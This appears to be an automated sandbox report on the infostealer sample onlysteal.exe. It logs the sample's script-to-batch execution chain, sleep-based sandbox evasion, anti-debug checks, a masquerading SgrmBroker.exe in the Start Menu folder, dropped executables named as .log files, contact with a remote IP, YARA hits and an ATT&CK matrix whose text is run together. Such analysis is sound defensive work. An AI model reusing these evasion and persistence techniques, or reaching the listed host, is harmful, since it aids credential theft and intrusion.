                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Memory allocated: 1550000 memory reserve | memory write watch
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Memory allocated: 1AF70000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: 21A0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: 1A3A0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: 15B0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: 1B1B0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: D80000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: 1A760000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: FC0000 memory reserve | memory write watch
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Memory allocated: 1AD00000 memory reserve | memory write watch
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\wYGfctxY.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kzbsFheO.log
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vmGXvtnF.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zVMHRGyj.log
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\plugneHL.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RpedHXOW.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\BUHwkZnR.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FPzqkKvM.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\DYEovgjB.log
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AchrHOgY.log
                                  Source: C:\Users\user\Desktop\onlysteal.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_0-23748
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe TID: 1280 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 1472 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 4044 Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 5128 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 6232 Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe TID: 3260 Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0023A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0023A69B
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0024C220
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0025B348 FindFirstFileExA, 0_2_0025B348
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024E6A3 VirtualQuery,GetSystemInfo, 0_2_0024E6A3
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Thread delayed: delay time: 922337203685477
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File opened: C:\Users\user\AppData
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File opened: C:\Users\user\AppData\Local
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File opened: C:\Users\user
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File opened: C:\Users\user\Documents\desktop.ini
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File opened: C:\Users\user\Desktop\desktop.ini
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe File opened: C:\Users\user\AppData\Local\Temp
                                  Source: wscript.exe, 00000002.00000003.2144379874.000000000320E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: SgrmBroker.exe, 0000000B.00000002.2484973614.000000001ACE2000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000010.00000002.2532034850.0000023A56BC9000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2758435074.0000000001425000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3079584451.000000001DC29000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001A.00000002.3123438764.000001957CC70000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3343374036.000000000105A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\Desktop\onlysteal.exe API call chain: ExitProcess graph end node graph_0-23939
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Process information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0024F838
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_00257DEE mov eax, dword ptr fs:[00000030h] 0_2_00257DEE
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0025C030 GetProcessHeap, 0_2_0025C030
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Process token adjusted: Debug
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process token adjusted: Debug
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process token adjusted: Debug
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process token adjusted: Debug
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process token adjusted: Debug
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0024F838
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024F9D5 SetUnhandledExceptionFilter, 0_2_0024F9D5
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0024FBCA
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_00258EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00258EBD
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Memory allocated: page read and write | page guard
                                  Source: C:\Users\user\Desktop\onlysteal.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Intorefnet\hyperBlockCrtCommon.exe "C:\Intorefnet/hyperBlockCrtCommon.exe"
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat"
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024F654 cpuid 0_2_0024F654
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0024AF0F
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Queries volume information: C:\Intorefnet\hyperBlockCrtCommon.exe VolumeInformation
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe VolumeInformation
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0024DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0024DF1E
                                  Source: C:\Users\user\Desktop\onlysteal.exe Code function: 0_2_0023B146 GetVersionExW, 0_2_0023B146
                                  Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                                  Stealing of Sensitive Information

                                  Source: Yara match File source: onlysteal.exe, type: SAMPLE
                                  Source: Yara match File source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.onlysteal.exe.609c6de.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 5.0.hyperBlockCrtCommon.exe.c80000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.onlysteal.exe.699b6de.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: onlysteal.exe PID: 716, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: hyperBlockCrtCommon.exe PID: 2016, type: MEMORYSTR
                                  Source: Yara match File source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe, type: DROPPED
                                  Source: Yara match File source: C:\Intorefnet\hyperBlockCrtCommon.exe, type: DROPPED
                                  Source: Yara match File source: C:\ProgramData\smss.exe, type: DROPPED
                                  Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, type: DROPPED

                                  Remote Access Functionality

                                  Source: Yara match File source: onlysteal.exe, type: SAMPLE
                                  Source: Yara match File source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.onlysteal.exe.609c6de.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 5.0.hyperBlockCrtCommon.exe.c80000.0.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 0.3.onlysteal.exe.699b6de.1.unpack, type: UNPACKEDPE
                                  Source: Yara match File source: 00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: 00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara match File source: Process Memory Space: onlysteal.exe PID: 716, type: MEMORYSTR
                                  Source: Yara match File source: Process Memory Space: hyperBlockCrtCommon.exe PID: 2016, type: MEMORYSTR
                                  Source: Yara match File source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe, type: DROPPED
                                  Source: Yara match File source: C:\Intorefnet\hyperBlockCrtCommon.exe, type: DROPPED
                                  Source: Yara match File source: C:\ProgramData\smss.exe, type: DROPPED
                                  Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting
                                  Valid Accounts2
                                  Command and Scripting Interpreter
                                  11
                                  Scripting
                                  11
                                  Process Injection
                                  212
                                  Masquerading
                                  OS Credential Dumping1
                                  System Time Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  1
                                  Encrypted Channel
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API
                                  1
                                  Registry Run Keys / Startup Folder
                                  1
                                  Registry Run Keys / Startup Folder
                                  1
                                  Disable or Modify Tools
                                  LSASS Memory121
                                  Security Software Discovery
                                  Remote Desktop ProtocolData from Removable Media1
                                  Non-Application Layer Protocol
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain AccountsAt1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  31
                                  Virtualization/Sandbox Evasion
                                  Security Account Manager1
                                  Process Discovery
                                  SMB/Windows Admin SharesData from Network Shared Drive11
                                  Application Layer Protocol
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                                  Process Injection
                                  NTDS31
                                  Virtualization/Sandbox Evasion
                                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                                  Deobfuscate/Decode Files or Information
                                  LSA Secrets1
                                  Remote System Discovery
                                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                                  Obfuscated Files or Information
                                  Cached Domain Credentials1
                                  System Network Configuration Discovery
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                                  Software Packing
                                  DCSync3
                                  File and Directory Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  DLL Side-Loading
                                  Proc Filesystem36
                                  System Information Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Behavior Graph ID: 1583653, Sample: onlysteal.exe, Start date: 03/01/2025, Architecture: WINDOWS, Score: 100
                                  Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for dropped file; 13 other signatures

                                  onlysteal.exe (started)
                                    dropped: C:\Intorefnet\hyperBlockCrtCommon.exe (PE32); C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe (data)
                                    wscript.exe (started)
                                      signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                      cmd.exe (started)
                                        conhost.exe (started)
                                        hyperBlockCrtCommon.exe (started)
                                          dropped: C:\Users\user\Desktop\vmGXvtnF.log (PE32); C:\Users\user\Desktop\plugneHL.log (PE32); C:\Users\...\IadHSrMxJwYAMPkyRTLDEKgeW.exe (PE32); 5 other malicious files
                                          signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 2 other signatures
                                          cmd.exe (started)
                                            signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
                                            conhost.exe (started)
                                            PING.EXE (started)
                                            chcp.com (started)
                                            SgrmBroker.exe (started)
                                              network: 185.216.71.25 (ports 49377, 49430, 49431), CLOUDCOMPUTINGDE, Germany
                                              dropped: C:\Users\user\Desktop\wYGfctxY.log (PE32); C:\Users\user\Desktop\BUHwkZnR.log (PE32); C:\Users\user\AppData\...\zuhvZR4ed0.bat (DOS)
                                              cmd.exe (started)
                                                w32tm.exe (started)
                                                conhost.exe (started)
                                                chcp.com (started)
                                                SgrmBroker.exe (started)
                                                  dropped: C:\Users\user\Desktop\RpedHXOW.log (PE32); C:\Users\user\Desktop\DYEovgjB.log (PE32); C:\Users\user\AppData\...\szcAPjpm25.bat (DOS)
                                                  cmd.exe (started)
                                                    signature: Uses ping.exe to sleep
                                                    conhost.exe (started)

                                  Source | Detection | Scanner | Label
                                  onlysteal.exe | 71% | ReversingLabs | Win32.Trojan.Amadey
                                  onlysteal.exe | 76% | Virustotal |
                                  onlysteal.exe | 100% | Avira | VBS/Runner.VPG
                                  onlysteal.exe | 100% | Joe Sandbox ML |

                                  Source | Detection | Scanner | Label
                                  C:\Users\user\Desktop\BUHwkZnR.log | 100% | Avira | TR/PSW.Agent.qngqt
                                  C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe | 100% | Avira | VBS/Runner.VPG
                                  C:\Users\user\Desktop\DYEovgjB.log | 100% | Avira | TR/PSW.Agent.qngqt
                                  C:\Users\user\Desktop\wYGfctxY.log | 100% | Avira | TR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\kzbsFheO.log | 100% | Avira | TR/PSW.Agent.qngqt
                                  C:\ProgramData\smss.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\Desktop\FPzqkKvM.log | 100% | Avira | TR/AVI.Agent.updqb
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\Desktop\RpedHXOW.log | 100% | Avira | TR/AVI.Agent.updqb
